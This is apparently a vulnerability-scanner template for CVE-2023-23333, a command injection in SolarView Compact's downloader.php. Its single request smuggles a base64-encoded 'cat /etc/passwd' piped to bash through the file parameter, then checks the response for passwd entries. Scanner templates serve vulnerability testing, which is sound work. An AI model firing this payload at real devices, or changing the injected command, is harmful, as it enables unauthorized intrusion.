id: CVE-2023-23333

info:
  name: SolarView downloader.php rce
  author: zan8in,zhizho
  severity: critical
  verified: true
  description: |
    There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.
    FOFA: SolarView Compact
  reference:
    - https://github.com/Timorlover/CVE-2023-23333
    - https://mp.weixin.qq.com/s/2aaL3Bh1gzYGTqKQXNh46A
  tags: cve,cve2023,rce,solarview
  created: 2023/06/15

set:
  hostname: request.url.host
rules:
  r0:
    request:
      raw: |
        GET /downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg==%7Cbase64%20-d%7Cbash%00.zip HTTP/1.1
        Host: {{hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()